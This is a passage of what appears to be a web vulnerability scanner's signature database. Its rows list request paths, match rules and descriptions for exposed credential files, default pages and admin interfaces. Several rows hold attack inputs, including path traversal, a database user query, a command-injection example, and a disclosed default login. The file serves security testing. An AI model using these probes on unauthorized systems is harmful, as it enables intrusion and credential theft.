information\",\"\",\"\"\n\"002737\",\"\",\"3\",\"@CGIDIRS.wwwacl\",\"GET\",\"CODE:200\",\"Contains authorization information\",\"\",\"\"\n\"002738\",\"\",\"3\",\"@CGIDIRS.www_acl\",\"GET\",\"CODE:200\",\"Contains authorization information\",\"\",\"\"\n\"002739\",\"\",\"3\",\"/.htpasswd\",\"GET\",\"BODY:.:.+&&CODE:200\",\"Contains authorization information\",\"\",\"\"\n\"002740\",\"\",\"3\",\"/.access\",\"GET\",\"CODE:200\",\"Contains authorization information\",\"\",\"\"\n\"002741\",\"\",\"3\",\"/.addressbook\",\"GET\",\"CODE:200\",\"PINE addressbook, may store sensitive e-mail address contact information and notes\",\"\",\"\"\n\"002742\",\"\",\"3\",\"/.bashrc\",\"GET\",\"CODE:200\",\"User home dir was found with a shell rc file. This may reveal file and path information.\",\"\",\"\"\n\"002743\",\"\",\"3\",\"/.bash_history\",\"GET\",\"BODY:(?:grep|cat|dir|ifconfig|history|vim|touch|head|tail)&&CODE:200\",\"A user's home directory may be set to the web root, the shell history was retrieved. This should not be accessible via the web.\",\"\",\"\"\n\"002744\",\"\",\"3\",\"/.forward\",\"GET\",\"CODE:200\",\"User home dir was found with a mail forward file. May reveal where the user's mail is being forwarded to.\",\"\",\"\"\n\"002745\",\"\",\"3\",\"/.history\",\"GET\",\"CODE:200\",\"A user's home directory may be set to the web root, the shell history was retrieved. This should not be accessible via the web.\",\"\",\"\"\n\"002746\",\"\",\"3\",\"/.htaccess\",\"GET\",\"CODE:200&&BODY:<files\",\"Contains configuration and/or authorization information\",\"\",\"\"\n\"002747\",\"\",\"3\",\"/.lynx_cookies\",\"GET\",\"CODE:200\",\"User home dir found with LYNX cookie file. May reveal cookies received from arbitrary web sites.\",\"\",\"\"\n\"002748\",\"\",\"3\",\"/.mysql_history\",\"GET\",\"BODY:(?i)(?:INSERT|DELETE|DROP|GRANT|SELECT)&&CODE:200\",\"Database SQL?\",\"\",\"\"\n\"002749\",\"\",\"3\",\"/.passwd\",\"GET\",\"CODE:200\",\"Contains authorization information\",\"\",\"\"\n\"002750\",\"\",\"3\",\"/.pinerc\",\"GET\",\"CODE:200\",\"User home dir found with a PINE rc file. May reveal system information, directories and more.\",\"\",\"\"\n\"002751\",\"\",\"3\",\"/.plan\",\"GET\",\"CODE:200\",\"User home dir with a .plan, a now mostly outdated file for delivering information via the finger protocol.\",\"\",\"\"\n\"002752\",\"\",\"3\",\"/.proclog\",\"GET\",\"CODE:200\",\"User home dir with a Procmail log file. May reveal user mail traffic, directories and more.\",\"\",\"\"\n\"002753\",\"\",\"3\",\"/.procmailrc\",\"GET\",\"CODE:200\",\"User home dir with a Procmail rc file. May reveal subdirectories, mail contacts and more.\",\"\",\"\"\n\"002754\",\"\",\"3\",\"/.profile\",\"GET\",\"CODE:200\",\"User home dir with a shell profile was found. May reveal directory information and system configuration.\",\"\",\"\"\n\"002755\",\"\",\"3\",\"/.rhosts\",\"GET\",\"CODE:200\",\"A user's home directory may be set to the web root, a .rhosts file was retrieved. This should not be accessible via the web.\",\"\",\"\"\n\"002756\",\"\",\"3\",\"/.sh_history\",\"GET\",\"BODY:(?:grep|cat|dir|ifconfig|history|vim|touch|head|tail)&&CODE:200\",\"A user's home directory may be set to the web root, the shell history was retrieved. This should not be accessible via the web.\",\"\",\"\"\n\"002757\",\"\",\"3\",\"/.ssh\",\"GET\",\"CODE:200\",\"A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.\",\"\",\"\"\n\"002758\",\"\",\"3\",\"/.ssh/authorized_keys\",\"GET\",\"CODE:200\",\"A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.\",\"\",\"\"\n\"002759\",\"\",\"3\",\"/.ssh/known_hosts\",\"GET\",\"CODE:200\",\"A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.\",\"\",\"\"\n\"002760\",\"\",\"3\",\"@CGIDIRSls\",\"GET\",\"BODY:neither '\\/\",\"The CERN server lets attackers view the host's path. Should be upgraded to Apache, as CERN is not maintained.\",\"\",\"\"\n\"002761\",\"https://www.securitytracker.com/id/1008523\",\"7\",\"////../../data/config/microsrv.cfg\",\"GET\",\"BODY:HostName\",\"Xerox WorkCentre allows any file to be retrieved remotely.\",\"\",\"\"\n\"002762\",\"https://www.securitytracker.com/id/1008523\",\"7\",\"////////@LFI()\",\"GET\",\"@LFI()\",\"Xerox WorkCentre allows any file to be retrieved remotely.\",\"\",\"\"\n\"002763\",\"https://en.wikipedia.org/wiki/Microsoft_FrontPage\",\"b\",\"/_vti_bin/shtml.exe/_vti_rpc\",\"GET\",\"CODE:200\",\"FrontPage may be installed.\",\"\",\"\"\n\"002764\",\"CWE-552\",\"2\",\"/doc/rt/overview-summary.html\",\"GET\",\"BODY:Packages&&BODY:Oracle Business Components\",\"Oracle Business Components for Java docs is running.\",\"\",\"\"\n\"002765\",\"CWE-552\",\"2\",\"/docs/sdb/en/html/index.html\",\"GET\",\"BODY:Support Database\",\"This may be a default SuSe Apache install. This is the support page.\",\"\",\"\"\n\"002766\",\"CWE-552\",\"2\",\"/jservdocs/\",\"GET\",\"CODE:200\",\"Default Apache JServ docs should be removed.\",\"\",\"\"\n\"002767\",\"CWE-552\",\"2\",\"/test/jsp/buffer1.jsp\",\"GET\",\"BODY:Internal Servlet\",\"Apache Tomcat default file found which reveals the web root. The /test directory should be removed.\",\"\",\"\"\n\"002768\",\"CWE-552\",\"2\",\"/test/jsp/buffer2.jsp\",\"GET\",\"BODY:Internal Servlet\",\"Apache Tomcat default file found which reveals the web root. The /test directory should be removed.\",\"\",\"\"\n\"002769\",\"CWE-552\",\"2\",\"/test/jsp/buffer3.jsp\",\"GET\",\"BODY:Internal Servlet\",\"Apache Tomcat default file found which reveals the web root. The /test directory should be removed.\",\"\",\"\"\n\"002770\",\"CWE-552\",\"2\",\"/test/jsp/buffer4.jsp\",\"GET\",\"BODY:Internal Servlet\",\"Apache Tomcat default file found which reveals the web root. The /test directory should be removed.\",\"\",\"\"\n\"002771\",\"CWE-552\",\"2\",\"/test/jsp/declaration/IntegerOverflow.jsp\",\"GET\",\"BODY:Internal Servlet\",\"Apache Tomcat default file found which reveals the web root. The /test directory should be removed.\",\"\",\"\"\n\"002772\",\"CWE-552\",\"2\",\"/test/jsp/extends1.jsp\",\"GET\",\"BODY:Internal Servlet\",\"Apache Tomcat default file found which reveals the web root. The /test directory should be removed.\",\"\",\"\"\n\"002773\",\"CWE-552\",\"2\",\"/test/jsp/extends2.jsp\",\"GET\",\"BODY:Internal Servlet\",\"Apache Tomcat default file found which reveals the web root. The /test directory should be removed.\",\"\",\"\"\n\"002774\",\"CWE-552\",\"2\",\"/test/jsp/Language.jsp\",\"GET\",\"BODY:Internal Servlet\",\"Apache Tomcat default file found which reveals the web root. The /test directory should be removed.\",\"\",\"\"\n\"002775\",\"CWE-552\",\"2\",\"/test/jsp/pageAutoFlush.jsp\",\"GET\",\"BODY:Internal Servlet\",\"Apache Tomcat default file found which reveals the web root. The /test directory should be removed.\",\"\",\"\"\n\"002776\",\"CWE-552\",\"2\",\"/test/jsp/pageDouble.jsp\",\"GET\",\"BODY:Internal Servlet\",\"Apache Tomcat default file found which reveals the web root. The /test directory should be removed.\",\"\",\"\"\n\"002777\",\"CWE-552\",\"2\",\"/test/jsp/pageExtends.jsp\",\"GET\",\"BODY:Internal Servlet\",\"Apache Tomcat default file found which reveals the web root. The /test directory should be removed.\",\"\",\"\"\n\"002778\",\"CWE-552\",\"2\",\"/test/jsp/pageImport2.jsp\",\"GET\",\"BODY:Internal Servlet\",\"Apache Tomcat default file found which reveals the web root. The /test directory should be removed.\",\"\",\"\"\n\"002779\",\"CWE-552\",\"2\",\"/test/jsp/pageInfo.jsp\",\"GET\",\"BODY:Internal Servlet\",\"Apache Tomcat default file found which reveals the web root. The /test directory should be removed.\",\"\",\"\"\n\"002780\",\"CWE-552\",\"2\",\"/test/jsp/pageInvalid.jsp\",\"GET\",\"BODY:Internal Servlet\",\"Apache Tomcat default file found which reveals the web root. The /test directory should be removed.\",\"\",\"\"\n\"002781\",\"CWE-552\",\"2\",\"/test/jsp/pageIsErrorPage.jsp\",\"GET\",\"BODY:Internal Servlet\",\"Apache Tomcat default file found which reveals the web root. The /test directory should be removed.\",\"\",\"\"\n\"002782\",\"CWE-552\",\"2\",\"/test/jsp/pageIsThreadSafe.jsp\",\"GET\",\"BODY:Internal Servlet\",\"Apache Tomcat default file found which reveals the web root. The /test directory should be removed.\",\"\",\"\"\n\"002783\",\"CWE-552\",\"2\",\"/test/jsp/pageSession.jsp\",\"GET\",\"BODY:Internal Servlet\",\"Apache Tomcat default file found which reveals the web root. The /test directory should be removed.\",\"\",\"\"\n\"002784\",\"CWE-552\",\"2\",\"/test/realPath.jsp\",\"GET\",\"BODY:WEBROOT\",\"Apache Tomcat default file found which reveals the web root. The /test directory should be removed.\",\"\",\"\"\n\"002785\",\"CWE-552\",\"2\",\"/tomcat-docs/index.html\",\"GET\",\"CODE:200\",\"Default Apache Tomcat documentation found.\",\"\",\"\"\n\"002786\",\"CWE-552\",\"2\",\"@CGIDIRStest-cgi.bat\",\"GET\",\"CODE:200\",\"This is an Apache for Win default. If Apache is lower than 1.3.23, this can be exploited as in test-cgi.bat?|dir+c:+>..\\htdocs\\listing.txt, but may not allow data sent back to the browser.\",\"\",\"\"\n\"002787\",\"CWE-552\",\"2\",\"/akopia/\",\"GET\",\"CODE:200\",\"Akopia is installed.\",\"\",\"\"\n\"002788\",\"CWE-552\",\"2\",\"/bc4j.html\",\"GET\",\"BODY:Business Components\",\"Default Oracle page, may allow limited administration.\",\"\",\"\"\n\"002789\",\"CWE-552\",\"2\",\"/dms0\",\"GET\",\"BODY:DMSDUMP\",\"Default Oracle 9iAS allows access to Dynamic Monitoring Services\",\"\",\"\"\n\"002790\",\"CWE-552\",\"2\",\"/jspdocs/\",\"GET\",\"BODY:OracleJSP\",\"Default Oracle JSP documentation.\",\"\",\"\"\n\"002791\",\"CWE-552\",\"2\",\"/mod_ose_docs\",\"GET\",\"BODY:Oracle Servlet Engine\",\"Default Oracle documentation found.\",\"\",\"\"\n\"002792\",\"CWE-552\",\"2\",\"/ojspdemos/basic/hellouser/hellouser.jsp\",\"GET\",\"CODE:200&&BODY:License Exception\",\"Oracle 9i default JSP page found, may be vulnerable to XSS in any field.\",\"\",\"\"\n\"002793\",\"CWE-552\",\"2\",\"/ojspdemos/basic/simple/usebean.jsp\",\"GET\",\"CODE:200&&BODY:License Exception\",\"Oracle 9i default JSP page found, may be vulnerable to XSS in any field.\",\"\",\"\"\n\"002794\",\"CWE-552\",\"2\",\"/ojspdemos/basic/simple/welcomeuser.jsp\",\"GET\",\"CODE:200&&BODY:License Exception\",\"Oracle 9i default JSP page found, may be vulnerable to XSS in any field.\",\"\",\"\"\n\"002795\",\"CWE-552\",\"2\",\"/oprocmgr-status\",\"GET\",\"BODY:Module Name\",\"Oracle 9iAS default install allows access to the Java Process Manager.\",\"\",\"\"\n\"002796\",\"CWE-552\",\"2\",\"/php/index.php\",\"GET\",\"CODE:200\",\"Monkey Http Daemon default PHP file found.\",\"\",\"\"\n\"002797\",\"CWE-552\",\"2\",\"/pls/portal30/admin_/\",\"GET\",\"BODY:Gateway Configuration Menu\",\"Default Oracle 9iAS allows unrestricted access to the mod_plsql DAD admin interface.\",\"\",\"\"\n\"002798\",\"CWE-552\",\"2\",\"/pls/simpledad/admin_/\",\"GET\",\"BODY:Gateway Configuration Menu\",\"This default may allow limited administration of the Oracle server.\",\"\",\"\"\n\"002799\",\"CWE-552\",\"2\",\"/pls/simpledad/admin_/gateway.htm?schema=sample\",\"GET\",\"BODY:Gateway Configuration Menu\",\"This default may allow limited administration of the Oracle server.\",\"\",\"\"\n\"002800\",\"CWE-552\",\"2\",\"/pls/simpledad/admin_/globalsettings.htm\",\"GET\",\"BODY:edit global gateway\",\"Oracle admin script allows modification of database information.\",\"\",\"\"\n\"002801\",\"CWE-552\",\"2\",\"/search/\",\"GET\",\"BODY:Sample Search Interface\",\"Default iPlanet search is enabled.\",\"\",\"\"\n\"002802\",\"CWE-552\",\"2\",\"/servlet/Counter\",\"GET\",\"CODE:200&&BODY:Error Occurred\",\"JRun default servlet found. All default code should be removed from servers.\",\"\",\"\"\n\"002803\",\"CWE-552\",\"2\",\"/servlet/DateServlet\",\"GET\",\"CODE:200&&BODY:Error Occurred\",\"JRun default servlet found. All default code should be removed from servers.\",\"\",\"\"\n\"002804\",\"CWE-552\",\"2\",\"/servlet/FingerServlet\",\"GET\",\"CODE:200&&BODY:Error Occurred\",\"JRun default servlet found. All default code should be removed from servers.\",\"\",\"\"\n\"002805\",\"CWE-552\",\"2\",\"/servlet/HelloWorldServlet\",\"GET\",\"CODE:200&&BODY:Error Occurred\",\"JRun default servlet found. All default code should be removed from servers.\",\"\",\"\"\n\"002806\",\"CWE-552\",\"2\",\"/servlet/IsItWorking\",\"GET\",\"BODY:Yes, It's working\",\"Default Java (JServ) pages are present.\",\"\",\"\"\n\"002807\",\"CWE-552\",\"2\",\"/servlet/SessionServlet\",\"GET\",\"CODE:200&&BODY:Error Occurred\",\"JRun or Netware WebSphere default servlet found. All default code should be removed from servers.\",\"\",\"\"\n\"002808\",\"CWE-552\",\"2\",\"/servlet/SimpleServlet\",\"GET\",\"CODE:200&&BODY:Error Occurred\",\"JRun default servlet found (possibly Websphere). All default code should be removed from servers.\",\"\",\"\"\n\"002809\",\"CWE-552\",\"2\",\"/servlet/SnoopServlet\",\"GET\",\"CODE:200&&BODY:Error Occurred\",\"JRun, Netware Java Servlet Gateway, or WebSphere default servlet found. All default code should be removed from servers.\",\"\",\"\"\n\"002810\",\"CWE-552\",\"2\",\"/xdk/\",\"GET\",\"BODY:Oracle XML Development\",\"Default Oracle documentation found.\",\"\",\"\"\n\"002811\",\"CWE-552\",\"2\",\"/xsql/demo/adhocsql/query.xsql?sql=select%20username%20from%20ALL_USERS\",\"GET\",\"BODY:USERNAME\",\"This allows attackers to perform queries to the Oracle database. This sample app should be removed.\",\"\",\"\"\n\"002812\",\"https://en.wikipedia.org/wiki/Microsoft_FrontPage\",\"2\",\"/admcgi/contents.htm\",\"GET\",\"CODE:200\",\"Default FrontPage CGI found.\",\"\",\"\"\n\"002813\",\"https://en.wikipedia.org/wiki/Microsoft_FrontPage\",\"2\",\"/admcgi/scripts/Fpadmcgi.exe\",\"GET\",\"CODE:200\",\"Default FrontPage CGI found.\",\"\",\"\"\n\"002814\",\"https://en.wikipedia.org/wiki/Microsoft_FrontPage\",\"2\",\"/admisapi/fpadmin.htm\",\"GET\",\"CODE:200\",\"Default FrontPage file found.\",\"\",\"\"\n\"002815\",\"https://en.wikipedia.org/wiki/Microsoft_FrontPage\",\"2\",\"/bin/admin.pl\",\"GET\",\"CODE:200\",\"Default FrontPage CGI found.\",\"\",\"\"\n\"002816\",\"https://en.wikipedia.org/wiki/Microsoft_FrontPage\",\"2\",\"/bin/cfgwiz.exe\",\"GET\",\"CODE:200\",\"Default FrontPage CGI found.\",\"\",\"\"\n\"002817\",\"https://en.wikipedia.org/wiki/Microsoft_FrontPage\",\"2\",\"/bin/CGImail.exe\",\"GET\",\"CODE:200\",\"Default FrontPage CGI found.\",\"\",\"\"\n\"002818\",\"https://en.wikipedia.org/wiki/Microsoft_FrontPage\",\"2\",\"/bin/contents.htm\",\"GET\",\"CODE:200\",\"Default FrontPage CGI found.\",\"\",\"\"\n\"002819\",\"https://en.wikipedia.org/wiki/Microsoft_FrontPage\",\"2\",\"/bin/fpadmin.htm\",\"GET\",\"CODE:200\",\"Default FrontPage CGI found.\",\"\",\"\"\n\"002820\",\"https://en.wikipedia.org/wiki/Microsoft_FrontPage\",\"2\",\"/bin/fpremadm.exe\",\"GET\",\"CODE:200\",\"Default FrontPage CGI found.\",\"\",\"\"\n\"002821\",\"https://en.wikipedia.org/wiki/Microsoft_FrontPage\",\"2\",\"/bin/fpsrvadm.exe\",\"GET\",\"CODE:200\",\"Default FrontPage CGI found.\",\"\",\"\"\n\"002822\",\"https://en.wikipedia.org/wiki/Microsoft_FrontPage\",\"2\",\"/cgi-bin/admin.pl\",\"GET\",\"CODE:200\",\"Default FrontPage CGI found.\",\"\",\"\"\n\"002823\",\"https://en.wikipedia.org/wiki/Microsoft_FrontPage\",\"2\",\"/cgi-bin/cfgwiz.exe\",\"GET\",\"CODE:200\",\"Default FrontPage CGI found.\",\"\",\"\"\n\"002824\",\"https://en.wikipedia.org/wiki/Microsoft_FrontPage\",\"2\",\"/cgi-bin/CGImail.exe\",\"GET\",\"CODE:200\",\"Default FrontPage CGI found.\",\"\",\"\"\n\"002825\",\"https://en.wikipedia.org/wiki/Microsoft_FrontPage\",\"2\",\"/cgi-bin/contents.htm\",\"GET\",\"CODE:200\",\"Default FrontPage CGI found.\",\"\",\"\"\n\"002826\",\"https://en.wikipedia.org/wiki/Microsoft_FrontPage\",\"2\",\"/cgi-bin/fpadmin.htm\",\"GET\",\"CODE:200\",\"Default FrontPage CGI found.\",\"\",\"\"\n\"002827\",\"https://en.wikipedia.org/wiki/Microsoft_FrontPage\",\"2\",\"/cgi-bin/fpremadm.exe\",\"GET\",\"CODE:200\",\"Default FrontPage CGI found.\",\"\",\"\"\n\"002828\",\"https://en.wikipedia.org/wiki/Microsoft_FrontPage\",\"2\",\"/cgi-bin/fpsrvadm.exe\",\"GET\",\"CODE:200\",\"Default FrontPage CGI found.\",\"\",\"\"\n\"002829\",\"https://en.wikipedia.org/wiki/Microsoft_FrontPage\",\"2\",\"/scripts/admin.pl\",\"GET\",\"CODE:200\",\"Default FrontPage CGI found.\",\"\",\"\"\n\"002830\",\"https://en.wikipedia.org/wiki/Microsoft_FrontPage\",\"2\",\"/scripts/cfgwiz.exe\",\"GET\",\"CODE:200\",\"Default FrontPage CGI found.\",\"\",\"\"\n\"002831\",\"https://en.wikipedia.org/wiki/Microsoft_FrontPage\",\"2\",\"/scripts/CGImail.exe\",\"GET\",\"CODE:200\",\"Default FrontPage CGI found.\",\"\",\"\"\n\"002832\",\"https://en.wikipedia.org/wiki/Microsoft_FrontPage\",\"2\",\"/scripts/contents.htm\",\"GET\",\"CODE:200\",\"Default FrontPage CGI found.\",\"\",\"\"\n\"002833\",\"https://en.wikipedia.org/wiki/Microsoft_FrontPage\",\"2\",\"/scripts/fpadmin.htm\",\"GET\",\"CODE:200\",\"Default FrontPage CGI found.\",\"\",\"\"\n\"002834\",\"https://en.wikipedia.org/wiki/Microsoft_FrontPage\",\"2\",\"/scripts/fpcount.exe\",\"GET\",\"CODE:200\",\"Default FrontPage CGI found.\",\"\",\"\"\n\"002835\",\"https://en.wikipedia.org/wiki/Microsoft_FrontPage\",\"2\",\"/scripts/fpremadm.exe\",\"GET\",\"CODE:200\",\"Default FrontPage CGI found.\",\"\",\"\"\n\"002836\",\"https://en.wikipedia.org/wiki/Microsoft_FrontPage\",\"2\",\"/scripts/fpsrvadm.exe\",\"GET\",\"CODE:200\",\"Default FrontPage CGI found.\",\"\",\"\"\n\"002837\",\"https://en.wikipedia.org/wiki/Microsoft_FrontPage\",\"2\",\"/_private/\",\"GET\",\"CODE:200&&!BODY:cannot be displayed\",\"FrontPage directory found.\",\"\",\"\"\n\"002838\",\"https://en.wikipedia.org/wiki/Microsoft_FrontPage\",\"2\",\"/_private/orders.htm\",\"GET\",\"CODE:200&&!BODY:cannot be displayed\",\"Default FrontPage file found.\",\"\",\"\"\n\"002839\",\"https://en.wikipedia.org/wiki/Microsoft_FrontPage\",\"2\",\"/_private/orders.txt\",\"GET\",\"CODE:200&&!BODY:cannot be displayed\",\"Default FrontPage file found.\",\"\",\"\"\n\"002840\",\"https://en.wikipedia.org/wiki/Microsoft_FrontPage\",\"2\",\"/_private/register.htm\",\"GET\",\"CODE:200&&!BODY:cannot be displayed\",\"Default FrontPage file found.\",\"\",\"\"\n\"002841\",\"https://en.wikipedia.org/wiki/Microsoft_FrontPage\",\"2\",\"/_private/register.txt\",\"GET\",\"CODE:200&&!BODY:cannot be displayed\",\"Default FrontPage file found.\",\"\",\"\"\n\"002842\",\"https://en.wikipedia.org/wiki/Microsoft_FrontPage\",\"2\",\"/_private/registrations.htm\",\"GET\",\"CODE:200&&BODY:cannot be displayed\",\"Default FrontPage file found.\",\"\",\"\"\n\"002843\",\"https://en.wikipedia.org/wiki/Microsoft_FrontPage\",\"2\",\"/_private/registrations.txt\",\"GET\",\"CODE:200&&!BODY:cannot be displayed\",\"Default FrontPage file found.\",\"\",\"\"\n\"002844\",\"https://en.wikipedia.org/wiki/Microsoft_FrontPage\",\"2\",\"/_private/_vti_cnf/\",\"GET\",\"CODE:200&&!BODY:cannot be displayed\",\"FrontPage directory found.\",\"\",\"\"\n\"002845\",\"https://en.wikipedia.org/wiki/Microsoft_FrontPage\",\"2\",\"/_vti_bin/\",\"GET\",\"CODE:200\",\"FrontPage directory found.\",\"\",\"\"\n\"002846\",\"https://en.wikipedia.org/wiki/Microsoft_FrontPage\",\"2\",\"/_vti_bin/admin.pl\",\"GET\",\"CODE:200\",\"Default FrontPage CGI found.\",\"\",\"\"\n\"002847\",\"https://en.wikipedia.org/wiki/Microsoft_FrontPage\",\"2\",\"/_vti_bin/cfgwiz.exe\",\"GET\",\"CODE:200\",\"Default FrontPage CGI found.\",\"\",\"\"\n\"002848\",\"https://en.wikipedia.org/wiki/Microsoft_FrontPage\",\"2\",\"/_vti_bin/CGImail.exe\",\"GET\",\"CODE:200\",\"Default FrontPage CGI found.\",\"\",\"\"\n\"002849\",\"https://en.wikipedia.org/wiki/Microsoft_FrontPage\",\"2\",\"/_vti_bin/contents.htm\",\"GET\",\"CODE:200\",\"Default FrontPage CGI found.\",\"\",\"\"\n\"002850\",\"https://en.wikipedia.org/wiki/Microsoft_FrontPage\",\"2\",\"/_vti_bin/fpadmin.htm\",\"GET\",\"CODE:200\",\"Default FrontPage CGI found.\",\"\",\"\"\n\"002851\",\"https://en.wikipedia.org/wiki/Microsoft_FrontPage\",\"2\",\"/_vti_bin/fpremadm.exe\",\"GET\",\"CODE:200\",\"Default FrontPage CGI found.\",\"\",\"\"\n\"002852\",\"https://en.wikipedia.org/wiki/Microsoft_FrontPage\",\"2\",\"/_vti_bin/fpsrvadm.exe\",\"GET\",\"CODE:200\",\"Default FrontPage CGI found.\",\"\",\"\"\n\"002853\",\"https://en.wikipedia.org/wiki/Microsoft_FrontPage\",\"2\",\"/_vti_bin/_vti_cnf/\",\"GET\",\"CODE:200\",\"FrontPage directory found.\",\"\",\"\"\n\"002854\",\"https://en.wikipedia.org/wiki/Microsoft_FrontPage\",\"2\",\"/_vti_cnf/_vti_cnf/\",\"GET\",\"CODE:200\",\"FrontPage directory found.\",\"\",\"\"\n\"002855\",\"https://en.wikipedia.org/wiki/Microsoft_FrontPage\",\"2\",\"/_vti_inf.html\",\"GET\",\"BODY:FPVersion=\",\"FrontPage/SharePoint is installed and reveals its version number (check HTML source for more information).\",\"\",\"\"\n\"002856\",\"https://en.wikipedia.org/wiki/Microsoft_FrontPage\",\"2\",\"/_vti_log/_vti_cnf/\",\"GET\",\"CODE:200\",\"FrontPage directory found.\",\"\",\"\"\n\"002857\",\"https://en.wikipedia.org/wiki/Microsoft_FrontPage\",\"2\",\"/_vti_pvt/administrators.pwd\",\"GET\",\"CODE:200\",\"Default FrontPage file found, may be a password file.\",\"\",\"\"\n\"002858\",\"https://en.wikipedia.org/wiki/Microsoft_FrontPage\",\"2\",\"/_vti_pvt/authors.pwd\",\"GET\",\"CODE:200\",\"Default FrontPage file found, may be a password file.\",\"\",\"\"\n\"002859\",\"https://en.wikipedia.org/wiki/Microsoft_FrontPage\",\"2\",\"/_vti_pvt/service.pwd\",\"GET\",\"CODE:200\",\"Default FrontPage file found, may be a password file.\",\"\",\"\"\n\"002860\",\"https://en.wikipedia.org/wiki/Microsoft_FrontPage\",\"2\",\"/_vti_pvt/users.pwd\",\"GET\",\"CODE:200\",\"Default FrontPage file found, may be a password file.\",\"\",\"\"\n\"002861\",\"CWE-552\",\"2\",\"/manual/servlets/scripts/servlet1/servform.htm\",\"GET\",\"BODY:invokes a servlet\",\"iPlanet default servlet found. All default code should be removed.\",\"\",\"\"\n\"002862\",\"CWE-552\",\"2\",\"/manual/servlets/scripts/shoes/shoeform.htm\",\"GET\",\"BODY:invokes a jsp\",\"iPlanet default servlet found. All default code should be removed.\",\"\",\"\"\n\"002863\",\"CWE-552\",\"2\",\"/examples/\",\"GET\",\"BODY:Servlet Samples\",\"JEUS default servlet example pages present\",\"\",\"\"\n\"002864\",\"CWE-552\",\"2\",\"/examples/context\",\"GET\",\"BODY:Context servlet\",\"JEUS default servlet examples disclose server directory\",\"\",\"\"\n\"002865\",\"CWE-552\",\"2\",\"/examples/forward1\",\"GET\",\"BODY:Forward1 servlet\",\"JEUS default servlet example\",\"\",\"\"\n\"002866\",\"CWE-552\",\"2\",\"/examples/forward2\",\"GET\",\"BODY:Forward2 servlet\",\"JEUS default servlet example\",\"\",\"\"\n\"002867\",\"CWE-552\",\"2\",\"/examples/header\",\"GET\",\"BODY:Header servlet\",\"JEUS default servlet example\",\"\",\"\"\n\"002868\",\"CWE-552\",\"2\",\"/examples/include1\",\"GET\",\"BODY:Include1 servlet\",\"JEUS default servlet example\",\"\",\"\"\n\"002869\",\"CWE-552\",\"2\",\"/examples/info\",\"GET\",\"BODY:Info servlet\",\"JEUS default servlet example\",\"\",\"\"\n\"002870\",\"CWE-552\",\"2\",\"/examples/jsp/index.html\",\"GET\",\"BODY:JSP Samples\",\"Tomcat or JEUS default JSP pages present.\",\"\",\"\"\n\"002871\",\"CWE-552\",\"2\",\"/help/contents.htm\",\"GET\",\"CODE:200\",\"Default Netscape manual found. All default pages should be removed.\",\"\",\"\"\n\"002872\",\"CWE-552\",\"2\",\"/help/home.html\",\"GET\",\"CODE:200\",\"Default Netscape manual found. All default pages should be removed.\",\"\",\"\"\n\"002873\",\"CWE-552\",\"2\",\"/manual/ag/esperfrm.htm\",\"GET\",\"CODE:200\",\"Default Netscape manual found. All default pages should be removed.\",\"\",\"\"\n\"002874\",\"CWE-552\",\"2\",\"/nethome/\",\"GET\",\"CODE:200\",\"Netscape Enterprise Server default doc/manual directory. Reveals server path at bottom of page.\",\"\",\"\"\n\"002875\",\"CWE-552\",\"2\",\"/com/novell/gwmonitor/help/en/default.htm\",\"GET\",\"CODE:200\",\"Netware gateway monitor access documentation found. All default documentation should be removed from web servers.\",\"\",\"\"\n\"002876\",\"CWE-552\",\"2\",\"/com/novell/webaccess/help/en/default.htm\",\"GET\",\"CODE:200\",\"Netware web access documentation found. All default documentation should be removed from web servers.\",\"\",\"\"\n\"002877\",\"CWE-552\",\"2\",\"/com/novell/webpublisher/help/en/default.htm\",\"GET\",\"CODE:200\",\"Netware web publisher documentation found. All default documentation should be removed from web servers.\",\"\",\"\"\n\"002878\",\"CWE-552\",\"2\",\"/servlet/AdminServlet\",\"GET\",\"CODE:200&&!BODY:<title>Axis<\\/title>\",\"Netware Web Search Server (adminservlet) found. All default code should be removed from web servers.\",\"\",\"\"\n\"002879\",\"CWE-552\",\"2\",\"/servlet/gwmonitor\",\"GET\",\"CODE:200\",\"Netware Gateway monitor found. All default code should be removed from web servers.\",\"\",\"\"\n\"002880\",\"CWE-552\",\"2\",\"/servlet/PrintServlet\",\"GET\",\"CODE:200\",\"Novell Netware default servlet found. All default code should be removed from the system.\",\"\",\"\"\n\"002881\",\"CWE-552\",\"2\",\"/servlet/SearchServlet\",\"GET\",\"CODE:200\",\"Novell Netware default servlet found. All default code should be removed from the system.\",\"\",\"\"\n\"002882\",\"CWE-552\",\"2\",\"/servlet/ServletManager\",\"GET\",\"CODE:401\",\"Netware Java Servlet Gateway found. Default user ID is servlet, default password is manager. All default code should be removed from Internet servers.\",\"\",\"\"\n\"002883\",\"CWE-552\",\"2\",\"/servlet/sq1cdsn\",\"GET\",\"CODE:200\",\"Novell Netware default servlet found. All default code should be removed from the system.\",\"\",\"\"\n\"002884\",\"CWE-552\",\"2\",\"/servlet/sqlcdsn\",\"GET\",\"CODE:401\",\"Netware SQL connector found. All default code should be removed from web servers.\",\"\",\"\"\n\"002885\",\"CWE-552\",\"2\",\"/servlet/webacc\",\"GET\",\"CODE:200\",\"Netware Enterprise and/or GroupWise web access found. All default code should be removed from Internet servers.\",\"\",\"\"\n\"002886\",\"CWE-552\",\"2\",\"/servlet/webpub\",\"GET\",\"CODE:200\",\"Netware Web Publisher found. All default code should be removed from web servers.\",\"\",\"\"\n\"002887\",\"CWE-552\",\"2\",\"/WebSphereSamples\",\"GET\",\"CODE:200\",\"Netware Webshere sample applications found. All default code should be removed from web servers.\",\"\",\"\"\n\"002888\",\"CWE-552\",\"2\",\"@CGIDIRScgi-test.exe\",\"GET\",\"CODE:200\",\"Default CGI found\",\"\",\"\"\n\"002934\",\"CWE-552\",\"2\",\"/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse\",\"GET\",\"BODY:SERVER_SOFTWARE\",\"Novell Netware 5.1 contains Novonyx default files which reveal system information. All default files should be removed.\",\"\",\"\"\n\"002935\",\"CWE-552\",\"2\",\"/lcgi/sys:/novonyx/suitespot/docs/sewse/misc/test.jse\",\"GET\",\"BODY:SCRIPT_NAME\",\"Novell Netware 5.1 contains Novonyx default files which reveal system information. All default files should be removed.\",\"\",\"\"\n\"002936\",\"CVE-2002-1634\",\"2\",\"/netbasic/websinfo.bas\",\"GET\",\"BODY:Company:&&BODY:Revision:\\sNetWare\",\"Novell Netware 5.1 contains Novonyx default files which reveal system information. All default files should be 